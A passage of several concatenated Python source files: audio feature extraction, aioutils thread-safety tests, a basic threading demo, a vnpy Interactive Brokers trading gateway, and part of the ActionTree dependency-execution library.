lpc_ftr = get_lpc_feature(input_audio, sampling_rate, order = order, preemphasis = preemphasis, includeDerivatives = includeDerivatives, win = win, inc = inc)
#CMVN
mfcc_ftr = cmvn(mfcc_ftr)
lpc_ftr = cmvn(lpc_ftr)
# Concatenate MFCC and LPC features
mfcc_lpc_ftr = np.stack((mfcc_ftr,lpc_ftr), axis=2)
mfcc_lpc_ftr = mfcc_lpc_ftr.astype(np.single)
return mfcc_lpc_ftr
|
test_threading.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import random
import asyncio
import threading
from aioutils import Group, Yielder, yielding
@asyncio.coroutine
def f(c):
yield from asyncio.sleep(random.random()*0.02)
return c
def test_group_threading():
""" Ensure that Pool and Group are thread-safe """
stopall = False
def t():
while not stopall:
g = Group()
for i in range(5):
g.spawn(f(i))
g.join()
time.sleep(random.random()*0.02)
tasks = [threading.Thread(target=t) for _ in range(5)]
for task in tasks: task.daemon = True
for task in tasks: task.start()
time.sleep(0.2)
stopall = True
for task in tasks: task.join()
assert asyncio.Task.all_tasks() == set(), asyncio.Task.all_tasks()
def test_yielder_threading():
""" Ensure Yielder are thread safe """
stopall = False
chars = 'abcdefg'
def gen_func():
y = Yielder()
for c in chars:
y.spawn(f(c))
yield from y.yielding()
def t():
while not stopall:
chars2 = list(gen_func())
assert set(chars2) == set(chars)
time.sleep(random.random()*0.02)
tasks = [threading.Thread(target=t) for _ in range(5)]
for task in tasks: task.daemon = True
for task in tasks: task.start()
time.sleep(0.2)
stopall = True
for task in tasks: task.join()
assert asyncio.Task.all_tasks() == set(), asyncio.Task.all_tasks()
def test_mixed():
""" Ensure mixed usage are thread safe """
chars = 'abcdefg'
stopall = False
def f1():
y = Yielder()
for c in chars:
y.spawn(f(c))
return list(y.yielding())
def f2():
g = Group()
for c in chars:
g.spawn(f(c))
g.join()
def t():
while not stopall:
f = random.choice([f1, f2])
r = f()
if f == f1:
assert set(r) == set(chars)
time.sleep(random.random()*0.02)
tasks = [threading.Thread(target=t) for _ in range(5)]
for task in tasks: task.daemon = True
for task in tasks: task.start()
time.sleep(0.2)
stopall = True
for task in tasks: task.join()
assert asyncio.Task.all_tasks() == set(), asyncio.Task.all_tasks()
def test_yielding_size_in_threading():
chars = 'abcdefgh'
def f1():
with yielding(2) as y:
for c in chars:
y.spawn(f(c))
yield from y
l = []
def f2():
for x in f1():
l.append(x)
t = threading.Thread(target=f2)
t.start()
t.join()
assert set(l) == set(chars)
if __name__ == '__main__':
test_group_threading()
test_yielder_threading()
test_mixed()
test_yielding_size_in_threading()
|
basics2_thread.py
|
import threading
import time
ls =[]
def count(n):
for i in range(1, n+1):
ls.append(i)
time.sleep(0.5)
def count2(n):
for i in range(1, n+1):
ls.append(i)
time.sleep(0.5)
x = threading.Thread(target=count, args=(5,))
x.start()
y = threading.Thread(target=count2, args=(5,))
y.start()
# Aby zsynchronizować wątki (poczekać na wykonanie poszczególnych funkcji)
# używać tylko jeśli wymaga, aby poczekać
x.join()
y.join()
print(ls)
|
ib_gateway.py
|
"""
Please install ibapi from Interactive Brokers github page.
"""
from copy import copy
from datetime import datetime
from queue import Empty
from threading import Thread
from ibapi import comm
from ibapi.client import EClient
from ibapi.common import MAX_MSG_LEN, NO_VALID_ID, OrderId, TickAttrib, TickerId
from ibapi.contract import Contract, ContractDetails
from ibapi.execution import Execution
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.ticktype import TickType
from ibapi.wrapper import EWrapper
from ibapi.errors import BAD_LENGTH
from vnpy.trader.gateway import BaseGateway
from vnpy.trader.object import (
TickData,
OrderData,
TradeData,
PositionData,
AccountData,
ContractData,
OrderRequest,
CancelRequest,
SubscribeRequest
)
from vnpy.trader.constant import (
Product,
OrderType,
Direction,
Exchange,
Currency,
Status,
OptionType,
)
ORDERTYPE_VT2IB = {OrderType.LIMIT: "LMT", OrderType.MARKET: "MKT"}
ORDERTYPE_IB2VT = {v: k for k, v in ORDERTYPE_VT2IB.items()}
DIRECTION_VT2IB = {Direction.LONG: "BUY", Direction.SHORT: "SELL"}
DIRECTION_IB2VT = {v: k for k, v in DIRECTION_VT2IB.items()}
DIRECTION_IB2VT["BOT"] = Direction.LONG
DIRECTION_IB2VT["SLD"] = Direction.SHORT
EXCHANGE_VT2IB = {
Exchange.SMART: "SMART",
Exchange.NYMEX: "NYMEX",
Exchange.GLOBEX: "GLOBEX",
Exchange.IDEALPRO: "IDEALPRO",
Exchange.CME: "CME",
Exchange.ICE: "ICE",
Exchange.SEHK: "SEHK",
Exchange.HKFE: "HKFE",
}
EXCHANGE_IB2VT = {v: k for k, v in EXCHANGE_VT2IB.items()}
STATUS_IB2VT = {
"Submitted": Status.NOTTRADED,
"Filled": Status.ALLTRADED,
"Cancelled": Status.CANCELLED,
"PendingSubmit": Status.SUBMITTING,
"PreSubmitted": Status.NOTTRADED,
}
PRODUCT_VT2IB = {
Product.EQUITY: "STK",
Product.FOREX: "CASH",
Product.SPOT: "CMDTY",
Product.OPTION: "OPT",
Product.FUTURES: "FUT",
}
PRODUCT_IB2VT = {v: k for k, v in PRODUCT_VT2IB.items()}
OPTION_VT2IB = {OptionType.CALL: "CALL", OptionType.PUT: "PUT"}
CURRENCY_VT2IB = {
Currency.USD: "USD",
Currency.CNY: "CNY",
Currency.HKD: "HKD",
}
TICKFIELD_IB2VT = {
0: "bid_volume_1",
1: "bid_price_1",
2: "ask_price_1",
3: "ask_volume_1",
4: "last_price",
5: "last_volume",
6: "high_price",
7: "low_price",
8: "volume",
9: "pre_close",
14: "open_price",
}
ACCOUNTFIELD_IB2VT = {
"NetLiquidationByCurrency": "balance",
"NetLiquidation": "balance",
"UnrealizedPnL": "positionProfit",
"AvailableFunds": "available",
"MaintMarginReq": "margin",
}
class IbGateway(BaseGateway):
""""""
default_setting = {
"TWS地址": "127.0.0.1",
"TWS端口": 7497,
"客户号": 1
}
def __init__(self, event_engine):
""""""
super(IbGateway, self).__init__(event_engine, "IB")
self.api = IbApi(self)
def connect(self, setting: dict):
"""
Start gateway connection.
"""
host = setting["TWS地址"]
port = setting["TWS端口"]
clientid = setting["客户号"]
self.api.connect(host, port, clientid)
def close(self):
"""
Close gateway connection.
"""
self.api.close()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
self.api.subscribe(req)
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
return self.api.send_order(req)
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
self.api.cancel_order(req)
def query_account(self):
"""
Query account balance.
"""
pass
def query_position(self):
"""
Query holding positions.
"""
pass
class IbApi(EWrapper):
""""""
def __init__(self, gateway: BaseGateway):
""""""
super(IbApi, self).__init__()
self.gateway = gateway
self.gateway_name = gateway.gateway_name
self.status = False
self.reqid = 0
self.orderid = 0
self.clientid = 0
self.ticks = {}
self.orders = {}
self.accounts = {}
self.contracts = {}
self.tick_exchange = {}
self.client = IbClient(self)
self.thread = Thread(target=self.client.run)
def connectAck(self): # pylint: disable=invalid-name
"""
Callback when connection is established.
"""
self.status = True
self.gateway.write_log("IB TWS连接成功")
def connectionClosed(self): # pylint: disable=invalid-name
"""
Callback when connection is closed.
"""
self.status = False
self.gateway.write_log("IB TWS连接断开")
def nextValidId(self, orderId: int): # pylint: disable=invalid-name
"""
Callback of next valid orderid.
"""
super(IbApi, self).nextValidId(orderId)
self.orderid = orderId
def currentTime(self, time: int): # pylint: disable=invalid-name
"""
Callback of current server time of IB.
"""
super(IbApi, self).currentTime(time)
dt = datetime.fromtimestamp(time)
time_string = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
msg = f"服务器时间: {time_string}"
self.gateway.write_log(msg)
def error(
self, reqId: TickerId, errorCode: int, errorString: str
): # pylint: disable=invalid-name
"""
Callback of error caused by specific request.
"""
super(IbApi, self).error(reqId, errorCode, errorString)
msg = f"信息通知,代码:{errorCode},内容: {errorString}"
self.gateway.write_log(msg)
def tickPrice( # pylint: disable=invalid-name
self, reqId: TickerId, tickType: TickType, price: float, attrib: TickAttrib
):
"""
Callback of tick price update.
"""
super(IbApi, self).tickPrice(reqId, tickType, price, attrib)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, price)
# Update name into tick data.
contract = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
# Forex and spot product of IDEALPRO has no tick time and last price.
# We need to calculate locally.
exchange = self.tick_exchange[reqId]
if exchange is Exchange.IDEALPRO:
tick.last_price = (tick.bid_price_1 + tick.ask_price_1) / 2
tick.datetime = datetime.now()
self.gateway.on_tick(copy(tick))
def tickSize(
self, reqId: TickerId, tickType: TickType, size: int
): # pylint: disable=invalid-name
"""
Callback of tick volume update.
"""
super(IbApi, self).tickSize(reqId, tickType, size)
if tickType not in TICKFIELD_IB2VT:
return
tick = self.ticks[reqId]
name = TICKFIELD_IB2VT[tickType]
setattr(tick, name, size)
self.gateway.on_tick(copy(tick))
def tickString(
self, reqId: TickerId, tickType: TickType, value: str
): # pylint: disable=invalid-name
"""
Callback of tick string update.
"""
super(IbApi, self).tickString(reqId, tickType, value)
if tickType != "45":
return
tick = self.ticks[reqId]
tick.datetime = datetime.fromtimestamp(value)
self.gateway.on_tick(copy(tick))
def orderStatus( # pylint: disable=invalid-name
self,
orderId: OrderId,
status: str,
filled: float,
remaining: float,
avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float,
):
"""
Callback of order status update.
"""
super(IbApi, self).orderStatus(
orderId,
status,
filled,
remaining,
avgFillPrice,
permId,
parentId,
lastFillPrice,
clientId,
whyHeld,
mktCapPrice,
)
orderid = str(orderId)
order = self.orders.get(orderid, None)
order.status = STATUS_IB2VT[status]
order.traded = filled
self.gateway.on_order(copy(order))
def openOrder( # pylint: disable=invalid-name
self,
orderId: OrderId,
ib_contract: Contract,
ib_order: Order,
orderState: OrderState,
):
"""
Callback when opening new order.
"""
super(IbApi, self).openOrder(
orderId, ib_contract, ib_order, orderState
)
orderid = str(orderId)
order = OrderData(
symbol=ib_contract.conId,
exchange=EXCHANGE_IB2VT.get(
ib_contract.exchange, ib_contract.exchange),
type=ORDERTYPE_IB2VT[ib_order.orderType],
orderid=orderid,
direction=DIRECTION_IB2VT[ib_order.action],
price=ib_order.lmtPrice,
volume=ib_order.totalQuantity,
gateway_name=self.gateway_name,
)
self.orders[orderid] = order
self.gateway.on_order(copy(order))
def updateAccountValue( # pylint: disable=invalid-name
self, key: str, val: str, currency: str, accountName: str
):
"""
Callback of account update.
"""
super(IbApi, self).updateAccountValue(key, val, currency, accountName)
if not currency or key not in ACCOUNTFIELD_IB2VT:
return
accountid = f"{accountName}.{currency}"
account = self.accounts.get(accountid, None)
if not account:
account = AccountData(accountid=accountid,
gateway_name=self.gateway_name)
self.accounts[accountid] = account
name = ACCOUNTFIELD_IB2VT[key]
setattr(account, name, float(val))
def updatePortfolio( # pylint: disable=invalid-name
self,
contract: Contract,
position: float,
marketPrice: float,
marketValue: float,
averageCost: float,
unrealizedPNL: float,
realizedPNL: float,
accountName: str,
):
"""
Callback of position update.
"""
super(IbApi, self).updatePortfolio(
contract,
position,
marketPrice,
marketValue,
averageCost,
unrealizedPNL,
realizedPNL,
accountName,
)
ib_size = contract.multiplier
if not ib_size:
ib_size = 1
price = averageCost / ib_size
pos = PositionData(
symbol=contract.conId,
exchange=EXCHANGE_IB2VT.get(contract.exchange, contract.exchange),
direction=Direction.NET,
volume=position,
price=price,
pnl=unrealizedPNL,
gateway_name=self.gateway_name,
)
self.gateway.on_position(pos)
def updateAccountTime(self, timeStamp: str): # pylint: disable=invalid-name
"""
Callback of account update time.
"""
super(IbApi, self).updateAccountTime(timeStamp)
for account in self.accounts.values():
self.gateway.on_account(copy(account))
def contractDetails(self, reqId: int, contractDetails: ContractDetails): # pylint: disable=invalid-name
"""
Callback of contract data update.
"""
super(IbApi, self).contractDetails(reqId, contractDetails)
ib_symbol = contractDetails.contract.conId
ib_exchange = contractDetails.contract.exchange
ib_size = contractDetails.contract.multiplier
ib_product = contractDetails.contract.secType
if not ib_size:
ib_size = 1
contract = ContractData(
symbol=ib_symbol,
exchange=EXCHANGE_IB2VT.get(ib_exchange, ib_exchange),
name=contractDetails.longName,
product=PRODUCT_IB2VT[ib_product],
size=ib_size,
pricetick=contractDetails.minTick,
net_position=True,
gateway_name=self.gateway_name,
)
self.gateway.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
def execDetails(
self, reqId: int, contract: Contract, execution: Execution
): # pylint: disable=invalid-name
"""
Callback of trade data update.
"""
super(IbApi, self).execDetails(reqId, contract, execution)
# today_date = datetime.now().strftime("%Y%m%d")
trade = TradeData(
symbol=contract.conId,
exchange=EXCHANGE_IB2VT.get(contract.exchange, contract.exchange),
orderid=str(execution.orderId),
tradeid=str(execution.execId),
direction=DIRECTION_IB2VT[execution.side],
price=execution.price,
volume=execution.shares,
time=datetime.strptime(execution.time, "%Y%m%d %H:%M:%S"),
gateway_name=self.gateway_name,
)
self.gateway.on_trade(trade)
def managedAccounts(self, accountsList: str): # pylint: disable=invalid-name
"""
Callback of all sub accountid.
"""
super(IbApi, self).managedAccounts(accountsList)
for account_code in accountsList.split(","):
self.client.reqAccountUpdates(True, account_code)
def connect(self, host: str, port: int, clientid: int):
"""
Connect to TWS.
"""
if self.status:
return
self.clientid = clientid
self.client.connect(host, port, clientid)
self.thread.start()
self.client.reqCurrentTime()
def close(self):
"""
Disconnect to TWS.
"""
if not self.status:
return
self.status = False
self.client.disconnect()
def subscribe(self, req: SubscribeRequest):
"""
Subscribe tick data update.
"""
if not self.status:
return
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所{req.exchange}")
return
ib_contract = Contract()
ib_contract.conId = str(req.symbol)
ib_contract.exchange = EXCHANGE_VT2IB[req.exchange]
# Get contract data from TWS.
self.reqid += 1
self.client.reqContractDetails(self.reqid, ib_contract)
# Subscribe tick data and create tick object buffer.
self.reqid += 1
self.client.reqMktData(self.reqid, ib_contract, "", False, False, [])
tick = TickData(
symbol=req.symbol,
exchange=req.exchange,
datetime=datetime.now(),
gateway_name=self.gateway_name,
)
self.ticks[self.reqid] = tick
self.tick_exchange[self.reqid] = req.exchange
def send_order(self, req: OrderRequest):
"""
Send a new order.
"""
if not self.status:
return ""
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所:{req.exchange}")
return ""
if req.type not in ORDERTYPE_VT2IB:
self.gateway.write_log(f"不支持的价格类型:{req.type}")
return ""
self.orderid += 1
ib_contract = Contract()
ib_contract.conId = str(req.symbol)
ib_contract.exchange = EXCHANGE_VT2IB[req.exchange]
ib_order = Order()
ib_order.orderId = self.orderid
ib_order.clientId = self.clientid
ib_order.action = DIRECTION_VT2IB[req.direction]
ib_order.orderType = ORDERTYPE_VT2IB[req.type]
ib_order.lmtPrice = req.price
ib_order.totalQuantity = req.volume
self.client.placeOrder(self.orderid, ib_contract, ib_order)
self.client.reqIds(1)
order = req.create_order_data(str(self.orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest):
"""
Cancel an existing order.
"""
if not self.status:
return
self.client.cancelOrder(int(req.orderid))
class IbClient(EClient):
""""""
def run(self):
"""
Reimplement the original run message loop of eclient.
Remove all unnecessary try...catch... and allow exceptions to interrupt loop.
"""
while not self.done and self.isConnected():
try:
text = self.msg_queue.get(block=True, timeout=0.2)
if len(text) > MAX_MSG_LEN:
errorMsg = "%s:%d:%s" % (BAD_LENGTH.msg(), len(text), text)
self.wrapper.error(
NO_VALID_ID, BAD_LENGTH.code(), errorMsg
)
self.disconnect()
break
fields = comm.read_fields(text)
self.decoder.interpret(fields)
except Empty:
pass
|
__init__.py
|
# coding: utf8
# Copyright 2013-2017 Vincent Jacques <vincent@vincent-jacques.net>
from __future__ import division, absolute_import, print_function
import ctypes
import datetime
import multiprocessing
import os.path
import pickle
import sys
import threading
# We import matplotlib in the functions that need it because
# upgrading it while using it leads to segfault. And we upgrade
# it via devlpr, that uses ActionTree.
import graphviz
libc = ctypes.CDLL(None)
try:
stdout = ctypes.c_void_p.in_dll(libc, "stdout")
except ValueError: # Not unittested: Not doctested: specific to macOS
stdout = ctypes.c_void_p.in_dll(libc, "__stdoutp")
try:
stderr = ctypes.c_void_p.in_dll(libc, "stderr")
except ValueError: # Not unittested: Not doctested: specific to macOS
stderr = ctypes.c_void_p.in_dll(libc, "__stderrp")
def execute(action, cpu_cores=None, keep_going=False, do_raise=True, hooks=None):
"""
Recursively execute an :class:`.Action`'s dependencies then the action.
:param Action action: the action to execute.
:param cpu_cores: number of CPU cores to use in parallel.
Pass ``None`` (the default value) to let ActionTree choose.
Pass :attr:`UNLIMITED` to execute an unlimited number of actions in parallel
(make sure your system has the necessary resources).
Note: CPU cores are managed like any other :class:`Resource`, and this parameter sets the availability
of :obj:`CPU_CORE` for this execution.
:type cpu_cores: int or None or UNLIMITED
:param bool keep_going: if ``True``, then execution does not stop on first failure,
but executes as many dependencies as possible.
:param bool do_raise: if ``False``, then exceptions are not re-raised as :exc:`CompoundException`
but only included in the :class:`.ExecutionReport`.
:param Hooks hooks: its methods will be called when execution progresses.
:raises CompoundException: when ``do_raise`` is ``True`` and dependencies raise exceptions.
:rtype: ExecutionReport
"""
if cpu_cores is None:
cpu_cores = multiprocessing.cpu_count()
if hooks is None:
hooks = Hooks()
return _Execute(cpu_cores, keep_going, do_raise, hooks).run(action)
UNLIMITED = object()
"""The availability of an infinite :class:`Resource`."""
class Action(object):
"""
The main class of ActionTree.
An action to be started after all its dependencies are finished.
Pass it to :func:`.execute`.
This is a base class for your custom actions.
You must define a ``do_execute(self, dependency_statuses)`` method that performs the action.
The ``dependency_statuses`` argument is a dictionary whose keys are ``self.dependencies`` and values are their
:class:`.ActionStatus`.
:ref:`outputs` describes how its return values, the exceptions it may raise and what it may print is handled.
Actions, return values and exceptions raised must be picklable.
"""
def __init__(self, label, dependencies=[], resources_required={}, accept_failed_dependencies=False):
"""
:param label: A string used to represent the action in :class:`GanttChart` and
:class:`DependencyGraph`. Can be retrieved by :attr:`label`.
:type label: str or None
:param list(Action) dependencies:
see :meth:`~.Action.add_dependency`
:param resources_required:
see :meth:`~.Action.require_resource`
:type resources_required: dict(Resource, int)
:param bool accept_failed_dependencies:
if ``True``, then the action will execute even after some of its dependencies failed.
"""
self.__label = label
self.__dependencies = list(dependencies)
self.__resources_required = {CPU_CORE: 1}
self.__resources_required.update(resources_required)
self.__accept_failed_dependencies = accept_failed_dependencies
@property
def label(self):
"""
The label passed to the constructor.
"""
return self.__label
def add_dependency(self, dependency):
"""
Add a dependency to be executed before this action.
Order of insertion of dependencies is not important.
:param Action dependency:
:raises DependencyCycleException: when adding the new dependency would create a cycle.
"""
if self in dependency.get_possible_execution_order(): # Not doctested: implementation detail
raise DependencyCycleException()
self.__dependencies.append(dependency)
@property
def dependencies(self):
"""
The list of this action's direct dependencies.
"""
return list(self.__dependencies)
def require_resource(self, resource, quantity=1):
"""
Set the quantity of a certain :class:`.Resource` required to run this action.
Note that an action that requires more than a resource's availability *will* be executed anyway.
It will just not be executed in parallel with any other action that requires the same resource.
:param Resource resource:
:param int quantity:
"""
self.__resources_required[resource] = quantity
@property
def resources_required(self):
"""
The list of this action's required resources and quantities required.
:rtype: list(tuple(Resource, int))
"""
return list(self.__resources_required.iteritems())
@property
def accept_failed_dependencies(self):
"""
``True`` if the action will execute even if some of its dependencies failed.
:rtype: bool
"""
return self.__accept_failed_dependencies
def get_possible_execution_order(self, seen_actions=None):
"""
Return the list of all this action's dependencies (recursively),
in an order that is suitable for linear execution.
Note that this order is not unique.
The order chosen is not specified.
"""
if seen_actions is None:
seen_actions = set()
actions = []
if self not in seen_actions:
seen_actions.add(self)
for dependency in self.__dependencies:
actions += dependency.get_possible_execution_order(seen_actions)
actions.append(self)
return actions
# @todo Add a notion of ActionSet
# ActionSet.add_dependency would add the dep to its leaves
# Action.add_dependency would accept an ActionSet
class Resource(object):
"""
A resource that an :class:`Action` can require for its execution.
You can use resources to protect stuff that must not be used by more than N actions at the same time,
à la `semaphore <https://en.wikipedia.org/wiki/Semaphore_(programming)>`_.
Like semaphorees, with an availability of 1,
they become `mutexes <https://en.wikipedia.org/wiki/Lock_(computer_science)>`_.
:ref:`resources` Describes how to use this class.
"""
def __init__(self, availability):
"""
:param availability: the number of instances available for this resource
:type availability: int or UNLIMITED
"""
self.__availability = availability
def _availability(self, cpu_cores):
return self.__availability
class CpuCoreResource(Resource):
def _availability(self, cpu_cores):
return cpu_cores
CPU_CORE = CpuCoreResource(0)
"""
A special :class:`.Resource` representing a processing unit.
You can pass it to :meth:`.Action.require_resource` if your action will execute on more than one core.
:type: Resource
"""
class Hooks(object):
"""
Base class to derive from when defining your hooks.
:func:`.execute` will call its methods when execution progresses.
"""
def action_pending(self, time, action):
"""
Called when an action is considered for execution, i.e. at the beginning of :func:`.execute`.
:param datetime.datetime time: the time at which the action was considered for execution.
:param Action action: the action.
"""
def action_ready(self, time, action):
"""
Called when an action is ready to be executed, i.e. when all its dependencies have succeeded.
:param datetime.datetime time: the time at which the action was ready.
:param Action action: the action.
"""
def action_canceled(self, time, action):
"""
Called when an action's execution is canceled, i.e. when some of its dependencies has failed.
:param datetime.datetime time: the time at which the action was canceled.
:param Action action: the action.
"""
def action_started(self, time, action):
"""
Called when an action's execution starts.
:param datetime.datetime time: the time at which the action was started.
:param Action action: the action.
"""
def action_printed(self, time, action, data):
"""
Called when an action prints something.
:param datetime.datetime time: the time at which the action printed the data.
:param Action action: the action.
:param str data: the data printed.
"""
def action_successful(self, time, action, return_value):
"""
Called when an action completes without error.
:param datetime.datetime time: the time at which the action completed.
:param Action action: the action.
:param return_value: the value returned by the action.
"""
def action_failed(self, time, action, exception):
"""
Called when an action completes with an exception.
:param datetime.datetime time: the time at which the action completed.
:param Action action: the action.
:param exception: the exception raised by the action
"""
class DependencyCycleException(Exception): # Not doctested: implementation detail
"""
Exception thrown by :meth:`.Action.add_dependency` when adding the new dependency would create a cycle.
"""
def __init__(self):
super(DependencyCycleException, self).__init__("Dependency cycle")
class CompoundException(Exception): # Not doctested: @todoc
"""
Exception thrown by :func:`.execute` when dependencies raise exceptions.
"""
def __init__(self, exceptions, execution_report):
super(CompoundException, self).__init__(exceptions)
self.__exceptions = exceptions
self.__execution_report = execution_report
@property
def exceptions(self):
"""
The list of exceptions raised.
"""
return self.__exceptions
@property
def execution_report(self):
"""
The :class:`.ExecutionReport` of the failed execution.
"""
return self.__execution_report
class ExecutionReport(object):
"""
ExecutionReport()
Execution report, returned by :func:`.execute`.
"""
class ActionStatus(object):
"""
Status of a single :class:`.Action`.
"""
def __init__(self, pending_time):
self.__pending_time = pending_time
self.__ready_time = None
self.__cancel_time = None
self.__start_time = None
self.__success_time = None
self.__return_value = None
self.__failure_time = None
self.__exception = None
self.__output = None
def _set_ready_time(self, ready_time):
self.__ready_time = ready_time
def _set_cancel_time(self, cancel_time):
self.__cancel_time = cancel_time
def _set_start_time(self, start_time):
self.__start_time = start_time
def _set_success(self, success_time, return_value):
self.__success_time = success_time
self.__return_value = return_value
self._add_output(b"")
def _set_failure(self, failure_time, exception):
self.__failure_time = failure_time
self.__exception = exception
self._add_output(b"")
def _add_output(self, output):
self.__output = (self.__output or b"") + output
@property
def status(self):
"""
The status of the action:
:attr:`SUCCESSFUL` if the action succeeded,
:attr:`FAILED` if the action failed,
and :attr:`CANCELED` if the action was canceled because some of its dependencies failed.
"""
if self.start_time:
if self.success_time:
return SUCCESSFUL
else:
assert self.failure_time
return FAILED
else:
assert self.cancel_time
return CANCELED
@property
def pending_time(self):
"""
The time when this action was considered for execution.
:rtype: datetime.datetime
"""
return self.__pending_time # Not doctested: @todoc
@property
def ready_time(self):
"""
The time when this action was ready to execute.
(``None`` if it was canceled before being ready).
:rtype: datetime.datetime or None
"""
return self.__ready_time
@property
def cancel_time(self):
"""
The time when this action was canceled.
(``None`` if it was started).
:rtype: datetime.datetime or None
"""
return self.__cancel_time
@property
def start_time(self):
"""
The time at the beginning of the execution of this action.
(``None`` if it was never started).
:rtype: datetime.datetime or None
"""
return self.__start_time
@property
def success_time(self):
"""
The time at the successful end of the execution of this action.
(``None`` if it was never started or if it failed).
:rtype: datetime.datetime or None
"""
return self.__success_time
@property
def return_value(self):
"""
The value returned by this action
(``None`` if it failed or was never started).
"""
return self.__return_value # Not doctested: @todoc
@property
def failure_time(self):
"""
The time at the successful end of the execution of this action.
(``None`` if it was never started or if it succeeded).
:rtype: datetime.datetime or None
"""
return self.__failure_time
@property
def exception(self):
"""
The exception raised by this action
(``None`` if it succeeded or was never started).
"""
return self.__exception # Not doctested: @todoc
@property
def output(self):
"""
Everything printed (and flushed in time) by this action.
(``None`` if it never started, ``""`` it if didn't print anything)
:rtype: str or None
"""
return self.__output # Not doctested: @todoc
def __init__(self, root_action, actions, now):
self._root_action = root_action
self.__action_statuses = {action: self.ActionStatus(now) for action in actions}
@property
def is_success(self):
"""
``True`` if the execution finished without error.
:rtype: bool
"""
return all(
action_status.status == SUCCESSFUL
for action_status in self.__action_statuses.itervalues()
)
def get_action_status(self, action):
"""
Get the :class:`ActionStatus` of an action.
:param Action action:
:rtype: ActionStatus
"""
return self.__action_statuses[action]
def get_actions_and_statuses(self):
"""
Get a list of actions and their statuses.
:rtype: list(tuple(Action, ActionStatus))
"""
return self.__action_statuses.items()
SUCCESSFUL = "SUCCESSFUL"
"The :attr:`.ActionStatus.status` after a successful execution."
FAILED = "FAILED"
"The :attr:`.ActionStatus.status` after a failed execution where this action raised an exception."
CANCELED = "CANCELED"
"The :attr:`.ActionStatus.status` after a failed execution where a dependency raised an exception."
PRINTED = "PRINTED"
PICKLING_EXCEPTION = "PICKLING_EXCEPTION"
class DependencyGraph(object):
"""
A visual representation of the dependency graph, using `Graphviz <http://graphviz.org/>`__.
"""
def __init__(self, action):
self.__graphviz_graph = graphviz.Digraph("action", node_attr={"shape": "box"})
nodes = {}
for (i, action) in enumerate(action.get_possible_execution_order()):
node = str(i)
nodes[action] = node
if action.label is None: # Not doctested: implementation detail
self.__graphviz_graph.node(node, shape="point")
else:
self.__graphviz_graph.node(node, action.label)
for dependency in action.dependencies:
assert dependency in nodes # Because we are iterating a possible execution order
self.__graphviz_graph.edge(node, nodes[dependency])
def write_to_png(self, filename): # Not unittested: too difficult
"""
Write the graph as a PNG image to the specified file.
See also :meth:`get_graphviz_graph` if you want to draw the graph somewhere else.
"""
directory = os.path.dirname(filename)
filename = os.path.basename(filename)
filename, ext = os.path.splitext(filename)
g = self.get_graphviz_graph()
g.format = "png"
g.render(directory=directory, filename=filename, cleanup=True)
def get_graphviz_graph(self):
"""
Return a :class:`graphviz.Digraph` of this dependency graph.
See also :meth:`write_to_png` for the simplest use-case.
"""
return self.__graphviz_graph.copy()
class GanttChart(object): # Not unittested: too difficult
"""
A visual representation of the timing of an execution.
"""
def __init__(self, report):
self.__actions = {
id(action): self.__make_action(action, status)
for (action, status) in report.get_actions_and_statuses()
}
self.__ordinates = {}
dependents = {}
for (action, _) in report.get_actions_and_statuses():
dependents.setdefault(action, set())
for dependency in action.dependencies:
dependents.setdefault(dependency, set()).add(action)
def compute(action, ordinate):
self.__ordinates[id(action)] = len(self.__actions) - ordinate
for d in sorted(
action.dependencies,
key=(
lambda d: report.get_action_status(d).success_time or
report.get_action_status(d).failure_time or
report.get_action_status(d).cancel_time or
report.get_action_status(d).ready_time or
report.get_action_status(d).pending_time
)
):
if len(dependents[d]) == 1:
ordinate = compute(d, ordinate - 1)
else:
dependents[d].remove(action)
return ordinate
last_ordinate = compute(report._root_action, len(self.__actions) - 1)
assert last_ordinate == 0, last_ordinate
class SuccessfulAction(object):
def __init__(self, action, status):
self.__label = action.label
self.__id = id(action)
self.__dependencies = set(id(d) for d in action.dependencies)
self.__ready_time = status.ready_time
self.__start_time = status.start_time
self.__success_time = status.success_time
@property
def min_time(self):
return self.__ready_time
@property
def max_time(self):
return self.__success_time
def draw(self, ax, ordinates, actions):
ordinate = ordinates[self.__id]
ax.plot([self.__ready_time, self.__start_time], [ordinate, ordinate], color="blue", lw=1)
ax.plot(
[self.__start_time, self.__success_time], [ordinate, ordinate],
color="blue", lw=4, solid_capstyle="butt",
)
# @todo Make sure the text is not outside the plot on the right
if self.__label is not None:
ax.annotate(
self.__label,
xy=(self.__start_time, ordinate), xytext=(0, 3), textcoords="offset points",
)
for d in self.__dependencies:
ax.plot([actions[d].max_time, self.min_time], [ordinates[d], ordinate], "k:", lw=1)
class FailedAction(object):
def __init__(self, action, status):
self.__label = action.label
self.__id = id(action)
self.__dependencies = set(id(d) for d in action.dependencies)
self.__ready_time = status.ready_time
self.__start_time = status.start_time
self.__failure_time = status.failure_time
@property
def min_time(self):
return self.__ready_time
@property
def max_time(self):
return self.__failure_time
def draw(self, ax, ordinates, actions):
ordinate = ordinates[self.__id]
ax.plot([self.__ready_time, self.__start_time], [ordinate, ordinate], color="red", lw=1)
ax.plot(
[self.__start_time, self.__failure_time], [ordinate, ordinate],
color="red", lw=4, solid_capstyle="butt",
)
if self.__label is not None:
ax.annotate(
self.__label,
xy=(self.__start_time, ordinate), xytext=(0, 3), textcoords="offset points",
)
for d in self.__dependencies:
ax.plot([actions[d].max_time, self.min_time], [ordinates[d], ordinate], "k:", lw=1)
class CanceledAction(object):
def __init__(self, action, status):
self.__label = action.label
self.__id = id(action)
self.__dependencies = set(id(d) for d in action.dependencies)
self.__ready_time = status.ready_time
self.__cancel_time = status.cancel_time
@property
def min_time(self):
